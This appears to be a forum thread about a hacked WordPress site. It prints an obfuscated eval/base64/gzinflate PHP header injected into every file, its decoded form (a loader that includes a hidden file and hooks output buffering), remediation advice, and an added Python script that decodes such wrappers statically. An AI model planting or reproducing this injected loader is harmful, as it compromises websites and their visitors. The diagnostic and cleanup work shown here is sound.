Blog hacked?

My customer told me that his AdSense suddenly stopped and he is seeing unusual things on his blogs. I checked just one site and found out there is additional code at the top of all the files…

<?php /f733bf1b10ff77ed52412f18b18b12d7/ eval(gzinflate(base64_decode(‘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’)));?>

Can someone tell me what this means?

Thanks a lot,
Jun

Yep, your site has been exploited.

I looked at the code, and it’s trying to include a file:
/home/caspert69/finewoodworkingguide.com/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/c77.php

This is the code, once it’s ‘decrypted’:


/*bsdtcnmlrwxnahajvlxqaswuszpblvymqbrfwrnfefgldanzep*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/caspert69/finewoodworkingguide.com/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/c77.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

My guess is it’s adding some spam links to your pages; check the HTML source to see if that’s so.

Solution? Do a fresh install from fresh sources, after making sure (by contacting your host) that the server is fully secured.

Also change every password for the server - cp, db, FTP accounts - everything. If you are using 3rd party code, check for security updates for each package.

Thanks a lot… It’s not my site actually, it’s my client’s and all sites in that server are affected…
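The decoding step described in the reply above can be done without ever running the injected code. The following is an added example, not code from the thread: it statically unpacks `eval(gzinflate(base64_decode(...)))` headers and lists the `.php` paths the decoded stage references. The function names and the sample input with its placeholder path are constructed for illustration.

```python
import base64
import re
import zlib

# eval(gzinflate(base64_decode('...'))), with straight or curly quotes
# (forum software often converts quotes, as in the first post).
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"['\"\u2018\u2019]([A-Za-z0-9+/=\s]+)['\"\u2018\u2019]\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)
# Quoted absolute paths to .php files inside the decoded stage.
PHP_PATH = re.compile(r"['\"](/[^'\"]+\.php)['\"]")


def decode_wrappers(php_source, max_bytes=1 << 20):
    """Statically decode every wrapper in php_source; nothing is executed."""
    decoded = []
    for match in WRAPPER.finditer(php_source):
        blob = "".join(match.group(1).split())  # drop line wraps
        try:
            raw = base64.b64decode(blob, validate=True)
            # PHP gzinflate() is raw DEFLATE: negative wbits, no zlib header.
            text = zlib.decompressobj(-15).decompress(raw, max_bytes)
        except (ValueError, zlib.error):
            continue  # not valid base64 or not a DEFLATE stream
        if text:
            decoded.append(text.decode("utf-8", errors="replace"))
    return decoded


def referenced_files(decoded):
    """Paths of the next-stage files that the decoded code points at."""
    return sorted({p for text in decoded for p in PHP_PATH.findall(text)})


def constructed_sample(inner_php):
    """Constructed test input: wrap harmless text the same way."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(comp.compress(inner_php.encode()) + comp.flush())
    return "<?php eval(gzinflate(base64_decode('%s')));?>" % blob.decode()


# Harmless stand-in for an infected file; the path is a placeholder.
INNER = "if(file_exists('/var/www/example/img/placeholder.php')){}"
SAMPLE = constructed_sample(INNER) + "\n<?php echo 'blog'; ?>\n"

if __name__ == "__main__":
    print(referenced_files(decode_wrappers(SAMPLE)))
```

Run over every `.php` file in the web root, the returned paths point at the dropped second-stage files that need to be found and removed along with the injected headers.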